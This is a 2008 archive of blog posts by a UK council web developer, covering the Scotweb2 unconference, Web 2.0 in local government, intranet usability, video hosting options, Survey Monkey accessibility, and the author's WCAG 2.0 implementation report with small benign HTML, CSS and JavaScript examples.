At the recent Scotweb2 Unconference, James Munro presented Patient Opinion, a website allowing users of the NHS to post feedback on their experiences - very similar to rateMDs.com, which operates in the US. It could be described as 'Trip Advisor for the NHS', in that you can check out a hospital or practice before visiting.

Munro stated that this process was about change, not choice. The aim is to create a dialogue between the service users and service providers. Actually, users were already talking about their experiences - on blogs, Flickr, YouTube etc - and Patient Opinion aims to provide a single platform to collate these comments and, crucially, to allow service providers to see and respond to the feedback.

The business model sees NHS services being asked to subscribe to get access to specific information, reports and the ability to respond to individual comments online. This then provides them with a platform to report the progress they have made in responding to a complaint, and further drives the idea of change.

The great advantage for the public is that they have a platform to report (often embarrassing) issues anonymously, whilst knowing that real change is also possible as a result. Because the site is independent, Munro claims that people are less inclined to leave the sort of rants that the NHS might expect to be inundated with should the site be owned by them. NHS Choices, the NHS's own site, rejects about 24% of the feedback it receives. Patient Opinion rejects only 5% - not because the standards are different, says Munro, but because people can see the real-life benefit of an independent site and are more inclined to leave legitimate, constructive feedback. And whilst positive feedback is great, the complaints provide the most value.

So what does this mean for other areas of the public sector? One problem is that we cannot 'force' third-party independent solutions into being - they have to develop organically. Of course, they are already happening across the Web 2.0 platforms mentioned earlier. The trick is to tap into these - not trying to moderate or silence the discussions going on, but contributing to the stream and showing people that we are listening and that change is happening.

There is a major cultural shift required to get backing for this. Once out there, comments cannot be taken back (you might be able to delete the original comment, but who knows where else it has gone). Anything you say must be honest, accountable and representative of the organisation. This may mean it has to go through levels of approval, which can ruin the pace and spontaneity of the dialogue (e.g. whilst you're trying to approve a response to one comment, five more have already cropped up). And there are dangers for those not playing by the rules - think of the recent story of the 13 Virgin Atlantic employees sacked for comments they made on Facebook which, their employers felt, brought the company into disrepute. Nevertheless, it is a whole new channel of communication which we cannot afford to ignore.

Tuesday 4 November 2008

WCAG 2.0 Proposed Recommendation

The WCAG 2.0 Proposed Recommendation has now been published by W3C. It contains revisions made as part of the Candidate Recommendation stage. I provided an implementation experience report as part of this and I'm pleased to say that I've been named as a contributor, so hopefully my experiences proved useful to the process.

Monday 3 November 2008

Scotweb2 Unconference summary

I'll soon be writing more specifically about some of the topics discussed at last Friday's Scotweb2 Unconference, but wanted to start with a brief summary of the day and some key messages I took from it.

All in all, the day was very uplifting and provided some real food for thought. It succeeded wonderfully in bringing together a small but committed number of Web 2.0 enthusiasts, mostly from the public sector but including a few from the commercial world. Although this meant that much of the discussion was in some way 'preaching to the converted', there were still plenty of new ideas to hear about and various calls to action.

Simon Dickson's talk exemplified this well. His passion and enthusiasm for WordPress came over in barrel loads, and he certainly gave people something to think about when comparing the minimal cost of implementing the open-source blogging CMS with some of the multi-million-pound projects he has seen in central government. It was also a more general rallying call for us to abandon the notion that quality is defined by cost, given that most of the traditional barriers to accessing these technologies are increasingly being broken down.

James Munro, from Patient Opinion, also delivered an interesting presentation on the relationship between his independent service and the NHS, with plenty of engaging discussion about public perception, trust and the machinations of organisational change through feedback.

Derek Hemphill presented BT Tradespace, which most of the audience confessed to never having heard of. I've now set up my free account so will report back about that soon.

Stephen Dale also gave a brief introduction to the Communities of Practice platform for local gov and public sector professionals to develop and share knowledge. Non public sector members are welcome to join in where appropriate, although overt selling is not tolerated. I myself am a member of three forums and am so far enjoying the experience.

As I say, I'll be writing more about specifics once I've had a chance to collect my thoughts and notes. Thanks again to Alex Stobart for organising what turned out to be a positive and exciting day of discussion.

Monday 27 October 2008

Getting to grips with Web 2.0

This Friday I'm off to the Scottish Web 2.0 Unconference in Edinburgh - "an informal, bar camp style event allowing participants to listen, network and share experiences with those who have designed and are managing Web 2 services".

To prepare for this I thought I'd have a quick recap of what Web 2.0 means to me.

Wikipedia describes Web 2.0 thus:
Web 2.0 is a term describing changing trends in the use of World Wide Web technology and web design that aims to enhance creativity, secure information sharing, collaboration and functionality of the web.
What qualifies as Web 2.0 is sometimes up for debate, and Tim Berners-Lee himself has questioned the value of the term, but for me the above keywords 'sharing, collaboration and functionality' strike at the heart of the matter. We're talking about a concept in which previously passive users become contributors, where content can be pulled apart and seamlessly put back together again, and where new ideas and innovations can more easily be built upon existing platforms.

So what does this mean for the local gov web developer? The public sector is traditionally very slow at responding to trends and change, so many of us are currently in a situation where we're locked out of the playground whilst the rest of the world has fun playing this new game. Why? Because of risk.

The perils of public opinion

The risks to which I'm referring are fairly obvious. Post a YouTube video and you may get negative comments; set up a MySpace profile and you don't know who you'll be making friends with; start a blog and people might find out you don't have a clue what you're talking about (*cough*). In essence, Web 2.0 is about giving power to the people - the Information Superhighway is no longer a one-way street (actually, it hasn't been a one-way street for a long time; it's just that continuing developments are making it easier, quicker and cheaper than ever to get involved).

Is this something that local government has the confidence to open itself up to? More often than not, regrettably, no. Once something is out there, there's no bringing it back in. The lack of control is something that I've found to be a major sticking point. But the obvious rebuttal to this is that conversations are going on out there, whether we're involved or not. Surely it's far better to be playing the game badly than not playing at all?

Getting it wrong

Well, not always. There have been some good examples of why dipping your toes in the Web 2.0 waters can often lead to losing a pinkie. And although the biggest mistake would be to ignore Web 2.0 completely, there are plenty of reasons to pause for thought. Bad examples we've seen recently include YouTube videos withdrawn because of inappropriate messages (someone forgot to disallow commenting) and social networking accounts shut down through lack of interest (very embarrassing to learn you have no friends).

So how can we avoid the pitfalls? Stephen Dale, in his excellent article on Utilising Web 2.0 in local government, gives the following tips:

Simple guidelines for Web 2.0 deployment

  • Don't think about Web 2.0 or e-government as being just about technology. It is about saving time and making life easier and more efficient for citizens.
  • Make sure you are resourced to cope. No point setting up a blog that encourages comments if you can't respond to each comment.
  • Carefully plan your strategy if using blogs. If it's a council blog, make sure it's part of a wider communications strategy and not the domain of one or two keen individuals.
  • Consider the reputational risks of publishing un-moderated citizen comments in online forums or blogs. Don't assume comments represent universal opinion.
  • Identify the audience you are trying to reach and use the appropriate channel. Not everyone has an account on Facebook, Myspace or Bebo, and not everyone has broadband. Know who you are excluding and plan for this.
  • Ensure there is a staff policy for using social media sites during working hours.
  • Most Web 2.0 solutions are relatively cheap to deploy. If you are planning to spend more than £100k on an enterprise solution you're doing something wrong - or you have particularly complex requirements.
From Stephen Dale's Utilising Web 2.0 in local government
I'll post more thoughts after Friday's conference, but one thing is certain - it's going to be a long and winding road.

Wednesday 22 October 2008

WCAG 2.0 and WAI interview

There's an interesting article in the latest e-access bulletin, produced by Headstar. As they haven't yet updated their website with this bulletin, I've reproduced the article below. For more information about the bulletin see www.headstar.com/eab.

Global Standards Giant Gears Up For Battle
by Dan Jellinek.

With the long-awaited appearance of version 2 of the World Wide Web Consortium's Web Content Accessibility Guidelines (WCAG) now expected in December, the spotlight is set to fall once more on the workings of this key international standards body.

The consortium, known as W3C, was founded in 1994 by the inventor of the web, Tim Berners-Lee, who remains its director. It functions as a developer and repository of the key technical standards and protocols that need to be shared by technology companies and users to ensure that the web remains open and universal.

With a current membership of more than 400 organisations, from large multinational technology companies to universities and charities, W3C has three main global bases: the European Research Consortium for Informatics and Mathematics (ERCIM) at the Sophia Antipolis technology park in the South of France; Massachusetts Institute of Technology's Computer Science and Artificial Intelligence Laboratory; and Keio University in Japan.

The consortium has a core staff of around 70, with around 30 in Europe, 30 in the US and 10 in Japan. But the actual headcount of those involved in its work is more than 500 if a tally is taken of everyone in the consortium's working groups, interest groups, and the wider community.

The WCAG work falls under the auspices of W3C's Web Accessibility Initiative (WAI), a programme that cuts across all the consortium's other areas. In a UK visit last month, two WAI staff, Shadi Abou-Zahra and Andrew Arch, met E-Access Bulletin in London to explain their work programme.

"WAI is one of the consortium's main work areas, and cuts across all the W3C's global locations," said Abou-Zahra. "One of our tasks is to cross-check all W3C's work such as that on [the web's core protocol] HTML to check it supports accessibility, because if standards like HTML don't support accessibility, you won't have accessible websites.

"This is really one of the most important pieces of work we are doing, though it is the least visible to the outside world. What's most well- known about WAI's work is its development of three guidelines - WCAG, ATAG (Authoring Tool Accessibility Guidelines) and UAAG (User Agent Accessibility Guidelines).

Authoring tool guidelines relate to content management systems, and are aimed at ensuring these systems can create accessible content, while user agents are tools like browsers and media players, Abou-Zahra says.

"Other areas of our work include education and outreach, which is really important, because most people who make inaccessible websites are often unaware of the issues for people with disabilities."

One major new piece of work undertaken by WAI is the EC-funded WAI-AGE Project ( http://www.w3.org/WAI/WAI-AGE/ ), a look at the implications of an ageing population for web access, given that older people are more likely to have disabilities and may also be less familiar with new technologies.

"Demographics worldwide are dramatically changing at the moment,"
says Andrew Arch, who works with Abou-Zahra on WAI-AGE. "The proportions of older to younger people are changing as well as the numbers. We're living longer, and we haven't got the support behind us.

"Lots of things have got to change in governments and organisations - with an ageing workforce, you have to keep learning to stay accessible."

The WAI-AGE project is partly aimed at finding out whether there are any significant new pieces of work needed to ensure web accessibility for an older population, Arch says.

"We've looked at what research and user observation has gone on over the decade. There is a pretty big overlap between older people and others with disabilities - sight starts to decline, motor dexterity - and individually these overlap. But with older people there is often a lack of recognition that there is a disability there. For example some people might just say they can't remember so well, rather than that they have a cognitive impairment. Or people won't see failing eye-sight as a disability, it's just 'part of growing old'. But they are disabilities, and often multiple disabilities."

Having gained a grasp of current research the project returned to guidelines such as WCAG 2.0 to see if any changes might be needed.
"A large proportion of the needs of older people are met by the new guidelines, but other things might need to feed into the guidance we will issue on implementing the guidelines, for example guidance on how people prepare content for older people.," said Arch.

"Many older people have not grown up with computers, and may not realise their capabilities, for example that you can magnify text in your browser."

However, as well as helping to address the problems of ageing, it is also important to challenge myths and assumptions about older people, such as the idea that none of them has any interest or expertise in using computers, says Abou-Zahra. "Social networking is an important part of ageing, for example. And making social networking sites more accessible for older users benefits everybody."

This argument is a development of the age-old mantra from the accessibility sector that people with disabilities want to use the web in the same way as everybody else - "it is a human right recognised by the UN," says Abou-Zahra. But he recognises that businesses in particular will also be interested in the additional business benefits, especially in the current financial climate.

"With commercial organisations the return on investment is often an important argument. Well, a few years ago, companies might have said 'how many older people are online?' but with demographics changing they know the answer. And with the current surge in mobile phone use there is another incentive, since accessible sites work better on mobile phones."

Other financial factors include helping organisations to hold onto employees as their average age rises, by making internal web systems more accessible, though more work is needed in all these areas, he says.
"We know there are not enough numbers attached to these business cases, and we hope for more soon. There is a business case document for accessibility on the WAI website, and we are updating it to reflect new developments."

For many, however, the key accessibility event of the year - assuming it does scrape into 2008 - will be the release of WCAG 2.0.

The WCAG working group held a face-to-face meeting in Boston at the beginning of October to examine the results of trial implementation of the draft guidelines on real websites, and now expects to finalise WCAG 2.0 as a fully-fledged W3C recommendation by December or at the latest by early next year, Abou-Zahra says.

The first version of the WCAG guidelines now dates back around a decade, and though it has proved a vital tool for raising awareness of accessibility issues, it has long been seen as over-technical, complex and unclear in many situations.

Version 2.0 is set to address many of these problems by moving away from rigid technical 'checkpoints' to more flexible 'success criteria.'

Another change of style will be a greater separation between the core guidelines and references to specific technologies such as Javascript or browser types, Abou-Zahra says.

"The work needs to be coupled to technologies, but how do we do that in such a way as to not make it outdated the moment it is released?
This is the complex issue," he says.

"WCAG 1.0 was too technology-specific. Back then HTML was more dominant, and there was less use of multimedia, but today we have a flurry of technologies such as Ajax, so the first lesson we learned is don't write for a specific technology. Also, in the days of WCAG 1.0 we had to exclude Javascript because it was not sufficiently standardised and assistive technology could not handle it consistently, but now that has largely changed so you need to include it, to look at how any technology should be accessible. The requirements - such as tagging images with text - needs to apply to any technology you are using.

"So WCAG is more decoupled - but having said that, no matter how much you decouple it from specific technologies, there still need to be points of contact with real technologies, places where the tyre hits the road. It is an issue the group is looking to resolve by updating implementation guidance."

Another ongoing problem with the WAI web content guidelines is that they do not fully address the needs of people with cognitive disabilities, admits Abou-Zahra, though he says this is a challenging longer term issue that the organisation is working to resolve alongside the wider access community.

"We know it does not fully meet the needs of people with cognitive disabilities such as some forms of learning disabilities, we admit this up-front," he says. "It is a longer term project, maybe one for WCAG 3.0. I feel this is an issue that the accessibility community as a whole needs to address, more research is needed."

Beyond the publication of WCAG 2.0, W3C and WAI will continue to prioritise accessibility across all its areas of work, he says. "WAI's work is often reduced to WCAG in the public eye, but it is a whole lot more than content, it is about making the web accessible in its broadest sense."

UK accessibility survey

A UK taskforce of charities and associations has launched a survey to find out about ICT accessibility awareness and practices.

The initial aim is to produce an ICT Accessibility Business Case, with case studies and an implementation plan, followed by other potential tools and information to help companies plan and incorporate ICT accessibility. The business case is expected to be published in March 2009.

The survey is open until 1st November, and participants can opt in to receive the survey results and final business case once published. No previous knowledge of accessibility is required.

Find the survey at http://cs.createsurvey.com/c/45/45/survey/507-Z0TuTA.html

The taskforce is made up of the following organisations:
  • AbilityNet
  • British Computer Society (BCS)
  • City University
  • Employers' Forum on Disability (EFD)
  • Intellect UK - Representing the UK Technology Industry
  • Leonard Cheshire Disability
  • Radar - The Disability Network
  • Society of Information Technology Management (SOCITM)
  • Worshipful Company of Information Technologists (WCIT)

Tuesday 21 October 2008

Downloads - a helping hand

Never over-estimate your users' abilities...

Through user feedback on our Intranet we've picked up that not all of our staff are computer-literate enough to know how to handle document downloads properly. It appears many are opening forms online, filling them in within the browser, and then trying to save or e-mail them - a technique which doesn't always work.

We've also got the added issue that our current Intranet is based on frames (tut tut) and unless you specify a target for document links, they will open within the frameset, compounding people's confusion.
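
To illustrate (file name hypothetical), the difference a target makes:

    <!-- No target: the document opens inside the current frame -->
    <a href="forms/enrolment.pdf">Enrolment form</a>

    <!-- target="_blank" opens a new window, escaping the frameset
         (target="_top" would instead replace the whole frameset) -->
    <a href="forms/enrolment.pdf" target="_blank">Enrolment form</a>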

The only solution to this is to try to educate our users, and to this end I've come up with the following short and simple tip:

Opening, saving and printing documents

To open, save or print documents, such as Word or PDF files, right-click on the document link (or Ctrl + click on a Mac) and then choose:
  • 'Open in new window' (to view online)
  • 'Save Link As...', 'Save Target As...' or equivalent (to save the document to your computer), or
  • 'Print target' (to print the document)

This tip can be replicated on all pages where there are downloads available, and is hopefully simple enough for all users to grasp. It takes account of the fact that we have multiple browsers within the organisation, but combines the instructions for brevity.

Trying to educate users of a public site is like pushing peas up a hill with a rake, but there's a much stronger return for doing it with an internal audience. Every member of staff you educate, in a way that saves them time, improves your organisation's efficiency and provides a real cost benefit. This is also why Help sections, FAQs and basic guidelines can be a great idea.

Info for non-mouse users

As a brief aside - the instructions above are only for mouse users. This excludes people with various disabilities, such as those with limited or no use of their arms, or blind users using screen reader software. It was decided to omit keyboard-specific instructions for three reasons: firstly, because including these details would have reduced the concise nature of the instructions; secondly, because we can assume that such users will have a high level of support already available to them within the organisation; and thirdly, because they will most likely already know how to open links and documents correctly with their preferred software or method of browsing.

Such assumptions cannot be made for a public audience, and we would expect to offer guidance, perhaps as part of a Help section or via the Accessibility link prominent on every page.

Monday 20 October 2008

Maximising Intranet usage

Keep them coming...
We launched our new intranet four months ago, and we're already seeing interest start to dip, with people going back to old habits. Used properly, the Intranet has the potential to be the most important channel of communication in the organisation - allowing key messages to reach staff instantly; providing a means of collaboration; and banishing the mental and physical barriers that serve to create silos across the departments.

There is of course a balance to be struck in any efforts to increase usage of a corporate intranet. Whilst you want people to use it, it must also serve the business needs of the organisation. So whilst there's room for the odd timewaster, this must be carefully balanced so as not to detract from the real purpose of the site.

Here are some things I'm already offering on the department's homepage:

Latest news

An obvious one really - pulling in press releases from the public-facing site, along with links to newsletters. This means the page will usually have something fresh to offer, and gives the user a feeling of being connected to the 'wider picture'.

Recent additions

A great way to promote new content.

Popular downloads

Again, a great way to highlight new files, but also to give people a shortcut to commonly accessed documents such as HR forms. The web stats for the site lend a hand here, highlighting the most popular files.

Dates and events

A really popular feature, and another one that gives the page a feeling of being linked to the wider world. Here we link to local events, such as festivals, lectures or exhibitions, as well as national and international campaigns (which for October include Black History Month, International Walk to School Month and School Libraries Month).

So what next? We're somewhat limited by technology, but here are a few possibilities:

RSS feeds

It would be great to provide some external content - national news, weather and local events, for example. Many sites offering this sort of information also provide RSS feeds, which we could quite easily pull into our pages. To this end I've created a test page with feeds from BBC News, Yahoo weather and a local events site. I'll be opening this up for consultation shortly, and hope the response will be a positive one. I'll also be encouraging suggestions for other feeds.

The feeds are pulled in using a nice Javascript generator available at itde.vccs.edu/rss2js.
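
To give a flavour, the generated embed code looks something like this - the script URL and parameters here are illustrative rather than exact, and the noscript fallback is my own addition:

    <script type="text/javascript"
      src="http://itde.vccs.edu/rss2js/feed2js.php?src=http%3A%2F%2Fnews.bbc.co.uk%2Frss.xml&num=5">
    </script>
    <noscript>
      <a href="http://news.bbc.co.uk/">Latest news from the BBC</a>
    </noscript>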

Cartoon strips

Daily cartoon strips such as Garfield and Dilbert are very popular, but there is a syndication cost attached to using them, making it an unlikely option. Even so, for those with a budget they can offer a really strong daily pull factor.

Friday 17 October 2008

public.tv vs youtube

I've been looking into the possibility of getting some of our Council's videos online, following a number of requests. Possible examples include footage of awards ceremonies, interviews with service providers, and content presented in British Sign Language as an alternative to text.

Part of the business case that I'm writing involves appraising the options for hosting such videos. Option 1, in-house hosting, seems an unlikely choice due to recent performance issues and the potential demands such content could place on our servers. Options 2 and 3 are outlined below:

Option 2 - YouTube

Summary

YouTube is an internationally recognised brand, now owned by Google. Nottinghamshire County Council posted a number of videos onto YouTube in January 2008, featuring the CEO discussing staff restructuring.

Costs and issues

Currently there is no charge for posting content to YouTube. A potential risk is that Google have announced that they intend to introduce advertising to YouTube videos in 2008, and the nature and suitability of these adverts cannot yet be ascertained. There are also no guarantees over the permanence or quality of service provided.

Restricted access

A problem also exists in that YouTube is currently blocked by the Council’s web filters. A change in policy would be required to allow access, either for selected staff only or on a Council-wide level.

Option 3 - public.tv

Summary

Many local organisations and government bodies have posted content to public.tv – a site owned by media company Ten Alps. This includes the Scottish Government, Scottish Parliament and the University of Edinburgh.

Costs and issues

There is no charge to post videos to public.tv. As with YouTube, there are no guarantees over the permanence or quality of service provided. The public.tv site is not blocked by the Council's filters. Advertising is present on the public.tv website, but does not appear within the video presentation itself.

Based on these findings my colleagues are now looking more closely at public.tv to see what it can offer us. I'm excited by the possibilities that this sort of feature could present to us, and will post details of any progress here in due course.

Update 31st Dec 2008 - I've just noticed that the Public.tv site seems to be down, displaying only a 'coming soon' message. Not sure what's going on there...

Thursday 16 October 2008

Survey Monkey accessibility

I've been approached to take on some responsibilities for my organisation's Survey Monkey account. Survey Monkey claims that it has a single purpose: "to enable anyone to create professional online surveys quickly and easily". We use it for internal and external consultations, as a third-party alternative to the clunky CMS currently running our corporate sites.

The first thing I was keen to establish was whether Survey Monkey was accessible. If we're using it for important Council consultations, and some of our users face barriers in completing the survey, then we quite rightly risk claims of discrimination. Moreover, if the surveys are poor in terms of usability, the response rate is likely to suffer.

My first port of call was Survey Monkey itself, which had the following to say:

Your SurveyMonkey survey designs are now Section 508 compliant and accessible!

SurveyMonkey is now the only online survey application whose surveys are Section 508 Certified. We ensure that by using our standard survey designs, your survey will meet all current US Federal Section 508 certification guidelines. Our developers have updated our SurveyMonkey survey design system across the board in all accounts. All standard survey designs are accessible and 508 certified and compliant for respondents with disabilities. This has all been accomplished without changing the appealing look or function of your survey.


  • You do not need to add any special settings or change anything within your survey design.
  • If you are using a standard survey theme in your survey design, it is automatically 508 compliant.
This seems quite encouraging. However, compliance with Section 508 does not inherently mean complete accessibility, and it is also not a legal benchmark here in the UK.

I next came across a Survey of Survey Tools carried out by the Web Accessibility Center at Ohio State University, looking at the accessibility of six of the top survey tools. This identifies a few issues which it suggests have not been solved by the recent efforts to comply with Section 508.

The overall grade given to Survey Monkey in this survey was B, meaning the majority of it was accessible. Problem areas included accessibility for sighted keyboard users, especially when in Windows' High-Contrast mode. It was also found that a keyboard user would not be able to navigate as an administrator. This means we could risk discriminating against our own staff as well as the end user.

I now intend to carry out some direct testing, and will publish the results here when that is complete.

Tuesday 14 October 2008

WCAG 2.0 and I

The Web Content Accessibility Guidelines (WCAG) are a collection of guidelines intended to make web content accessible to all users, regardless of technology, disability and so on. They were first published by the World Wide Web Consortium (W3C) in 1999. Over the past few years there has been an effort to update these guidelines with a second version - WCAG 2.0.

WCAG 2.0 Candidate Recommendation

Earlier this year I was involved in the Candidate Recommendation stage of WCAG 2.0. This was essentially a chance for web developers and designers to 'test-drive' the guidelines to ensure they are usable in real-life scenarios. With a number of the guidelines up for review as potentially unworkable, this stage of the process was vital.

I submitted a proposal to re-design www.prettysimple.co.uk and this was chosen as one of the implementation sites in June 2008.

Implementation experience

On submitting my site re-design for the WCAG 2.0 Candidate Recommendation, I was asked to provide feedback on all relevant areas of conformance - detailing how I met each guideline. My feedback was as follows:

1.1.1: Non-text Content (A)

Alt descriptions for images with relevant content. Null alt attributes for decorative images.
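
By way of illustration (file names and text hypothetical):

    <img src="team-photo.jpg" alt="The web team at the 2008 awards ceremony">
    <img src="divider.gif" alt="">  <!-- decorative, so ignored by screen readers -->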

1.3.1: Info and Relationships (A)

Semantic elements used to structure page and convey information. Includes using navigation lists and page headings, and using CSS for layout and formatting.
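
In practice this means markup along these lines (content hypothetical), with CSS handling the presentation:

    <h1>About this site</h1>
    <ul id="nav">
      <li><a href="/">Home</a></li>
      <li><a href="/contact/">Contact</a></li>
    </ul>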

1.4.1: Use of Color (A)

Colours not used to convey meaning.

1.4.3: Contrast (Minimum) (AA)

High contrast for text achieved using a span background colour.
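
A rough sketch of the technique (selector and colours hypothetical) - the span gives the text a solid backing, so the contrast no longer depends on whatever sits behind it:

    h1 span { background-color: #000; color: #fff; }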

1.4.4: Resize text (AA)

All text can be resized by user agents, by at least 200%.

1.4.5: Images of Text (AA)

Non-essential text appearing as images given very large font sizes and alternative text attributes.

2.1.1: Keyboard (A)

All aspects of the site can be navigated and accessed by keyboard. Use of skip links.

2.1.2: No Keyboard Trap (A)

No keyboard traps present.

2.4.1: Bypass Blocks (A)

Skip links provided, allowing users to bypass repeated blocks of content.
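
A typical skip link (id hypothetical):

    <a href="#content">Skip to main content</a>
    ...
    <div id="content">
      <!-- main page content -->
    </div>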

2.4.2: Page Titled (A)

Appropriate titles given to all pages.

2.4.3: Focus Order (A)

All elements appear in the correct order in the source code.

2.4.4: Link Purpose (In Context) (A)

Link text sufficiently descriptive to be obvious when read alone.

2.4.5: Multiple Ways (AA)

Main navigation links are supplemented by relevant contextual links within main content.

2.4.6: Headings and Labels (AA)

Headings used to highlight subsections of each page, where appropriate.

2.4.7: Focus Visible (AA)

All links have highly visible link, visited, focus, hover and active states.

3.1.1: Language of Page (A)

Default language defined on every page.
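
For an XHTML page this is a one-line fix (language code as appropriate):

    <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">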

3.2.1: On Focus (A)

Links do not open in new window.

3.2.2: On Input (A)

Links do not open in new window.

3.2.3: Consistent Navigation (AA)

Navigation is consistent on every page.

3.2.4: Consistent Identification (AA)

All functionality is consistent across every page.

4.1.1: Parsing (A)

All XHTML and CSS validated according to formal grammars.

Acceptance e-mail and amendments

On Wednesday September 24th I received an e-mail from Loretta Guarino Reid, co-chair of the WCAG Working Group, telling me that my site had been evaluated and found to conform to level AA of WCAG 2.0, with just a couple of exceptions. These were:

Insufficient contrast for the main menu

This came about from a change in the rules for colour contrast. I had used algorithms relevant to WCAG 1.0, due to a lack of good tools for testing against WCAG 2.0. However, after a bit of searching I found the WAT-C Luminosity Contrast Ratio Analyser 1.1 and used this to bring the colours into conformity.
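
For the curious, WCAG 2.0 defines contrast in terms of relative luminance. The sketch below (my own illustration, not the WAT-C tool) shows the calculation in Javascript:

    // WCAG 2.0 contrast ratio, per the guidelines' relative luminance formula
    function channel(c) {                        // c in the range 0-255
      c = c / 255;
      return c <= 0.03928 ? c / 12.92 : Math.pow((c + 0.055) / 1.055, 2.4);
    }
    function luminance(r, g, b) {
      return 0.2126 * channel(r) + 0.7152 * channel(g) + 0.0722 * channel(b);
    }
    function contrastRatio(fg, bg) {             // fg, bg as [r, g, b] arrays
      var l1 = luminance(fg[0], fg[1], fg[2]);
      var l2 = luminance(bg[0], bg[1], bg[2]);
      return (Math.max(l1, l2) + 0.05) / (Math.min(l1, l2) + 0.05);
    }
    // Example: white on grey #767676 gives roughly 4.54:1, just above the
    // 4.5:1 minimum required for AA conformance at normal text sizes.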

Use of color

It was noticed that some links could only be identified as such by their colour. Making all links bold as well resolved this, in line with the advice given in the notes accompanying F73: Failure of Success Criterion 1.4.1.
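
The fix itself amounts to a single style rule (selector hypothetical):

    /* links distinguished by weight as well as colour */
    #content a { font-weight: bold; }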

Implementation report

I'm now hoping that my site will be included in the final report, which the working group hopes to publish by Christmas 2008.

PS: For an excellent account of implementing WCAG 2.0, from a fellow implementor, see Mike Cherim's article My WCAG 2.0 AAA Implementation.

Wednesday 1 October 2008

Aberdeenshire Council blog

In September 2008 Aberdeenshire Council's web team set up a blog in order to communicate with the public and their own staff during the redesign of their corporate website. They asked for comments on the Public Sector Forum and I gave the following feedback:

This is a very interesting approach to gathering user feedback, and notable that you have used just one platform for both staff and the general public. It would be useful to know how you are promoting the blog to the two groups, and whether your rules for comment moderation reflect those potentially disparate audiences.

The most attractive thing for me is that the blog has a very clearly defined raison d’être. The fact that it will have a finite lifespan (i.e. until the delivery of the new site) means that you’ve set a realistic premise – most open-ended blogs die a death sooner or later, which can look very bad for an organisation.

I do wonder whether it might be wise to offer more traditional ways for users to provide feedback as well, though. The blog itself offers no other method of contact - was it a conscious decision not to encourage that? Many users may not have the confidence to submit a comment, to be read and scrutinized by the public at large, and past studies have suggested that about 95% of blog users are ‘lurkers’, never contributing to discussions. There is also a risk that only the more technically proficient will find and engage with the blog, excluding many of the users whom your website improvements could most benefit. Perhaps you are planning other forms of outreach to counter these issues?

All in all, though, this looks like a great effort to involve your users from a very early stage of development, when significant change can still be effected without significant cost.

The response to my feedback was positive and very proactive, with a Contact Us section appearing the next day. I look forward to seeing how this blog develops over the coming months.